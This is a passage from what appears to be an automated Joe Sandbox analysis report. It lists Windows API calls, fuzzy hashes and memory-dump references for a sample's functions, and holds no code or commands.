                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fc8796970a973dc87221e98108a2a93a1a25a1865d6c73dcdbff0442f1d5712
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F841C230A10216DFCB11CF58D884AA977F5FF4A714F1442E8EA599B261CB74E996CF40
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00262187
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002343AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetCurrentThreadId.KERNEL32 ref: 002343B4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00232F00), ref: 002343BB
                                                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 0026219B
                                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 002621E8
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 002621EE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 90d7f69bf89296ba6ebd388f7ad41d515638523af83d9c72b8145c0ee0fc1f98
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 38c9d99b09430710d258242e7c234cea4188765116fb487c7daac7ddd0830fd0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d7f69bf89296ba6ebd388f7ad41d515638523af83d9c72b8145c0ee0fc1f98
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C3152B1E10509AFCB04EFA5C885DAEB7F8EF58304B5084AAE415E7311DB71DE45CBA0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E8E2
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E8F9
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E924
                                                                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0023E92F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e1a80026cd1535f0cc93ca4014e7057e1b57ba346721c63dc8f12e8cfd98be42
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 619d2ac5c65f7b8e854e09d41bc75ca437e2233cc210ccd17dca497d049fe43a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a80026cd1535f0cc93ca4014e7057e1b57ba346721c63dc8f12e8cfd98be42
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F721E2B1D00219AFCB10AFA4D982BBEB7F8EF55350F1540A5E904BB281D7709E55CBA1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,0026DC30), ref: 0023DBA6
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0023DBB5
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0023DBC4
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0026DC30), ref: 0023DC21
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 002632A6
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002632C0
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002632CE
                                                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002632DC
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002396E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00238271,?,000000FF,?,002390BB,00000000,?,0000001C,?,?), ref: 002396F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002396E4: lstrcpyW.KERNEL32(00000000,?,?,00238271,?,000000FF,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 00239719
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002396E4: lstrcmpiW.KERNEL32(00000000,?,00238271,?,000000FF,?,002390BB,00000000,?,0000001C,?,?), ref: 0023974A
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 0023828A
                                                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 002382B0
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 002382EB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 0026615A
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0026616C
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00266177
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002662B5
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00232394
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002323A6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002323BC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002323D7
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0023EB14
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0023EB47
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0023EB5D
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0023EB64
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,001FD369,00000000,00000004,00000000), ref: 001FD588
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001FD594
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001FD59B
                                                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 001FD5B9
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001D78B1
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 001D78C5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 001D78CF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0020338D,00000364,00000000,00000000,00000000,?,002035FE,00000006,FlsSetValue), ref: 00203418
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0020338D,00000364,00000000,00000000,00000000,?,002035FE,00000006,FlsSetValue,00273260,FlsSetValue,00000000,00000364,?,002031B9), ref: 00203424
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0020338D,00000364,00000000,00000000,00000000,?,002035FE,00000006,FlsSetValue,00273260,FlsSetValue,00000000), ref: 00203432
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BA8B
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BAB0
                                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BABA
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0023B69A,?,00008000), ref: 0023BAED
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0026888E
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 002688A6
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 002688CA
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002688E5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00233712
                                                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00233723
                                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0023372A
                                                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00233731
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 79f9b3a28c8b9a4e525ebac8dd13277848d0ecaef5aa244059cf8e53a1f619b7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bec5a162e10a2c5acd65eb2567171cfede0e4b81c2fdd07316187ccaff1fbddf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79f9b3a28c8b9a4e525ebac8dd13277848d0ecaef5aa244059cf8e53a1f619b7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80E09BF166122877DB205B62BC4DEE7BF5CEF42BA1F104015F105D1090DAE4C640C5B1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D1F87
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1F96
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: BeginPath.GDI32(?), ref: 001D1FAD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1F2D: SelectObject.GDI32(?,00000000), ref: 001D1FD6
                                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002692E3
                                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 002692F0
                                                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 00269300
                                                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 0026930E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 09bbb1f24d44c3feaf1afe59b76a608c6e9cea03fd7595fcd2d7e88a537482d8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3c917afbfed3bf5484633a01f934d10ea327dcaf6beeb2e12a53b1a31a7d0631
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09bbb1f24d44c3feaf1afe59b76a608c6e9cea03fd7595fcd2d7e88a537482d8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F0BE31111259BBDB121F54BC0EFCE3F59AF0A320F008040FA11611E1CBB455658FE5
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 001D21BC
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 001D21C6
                                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 001D21D9
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 001D21E1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cf7aa7d98a76e7653e8f5bbdbd739b8a90b6535c7a1541b0656b5484e3f1c644
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d577474d97c02ec1049703987d15402f5fa74ec3d9885162e10806fe4ae4dfb2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf7aa7d98a76e7653e8f5bbdbd739b8a90b6535c7a1541b0656b5484e3f1c644
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E06532740244ABDB215F75BC0DBE83B51AB26335F04C269F7BA540E0C7F186909B10
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0022EC36
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0022EC40
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0022EC60
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 0022EC81
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
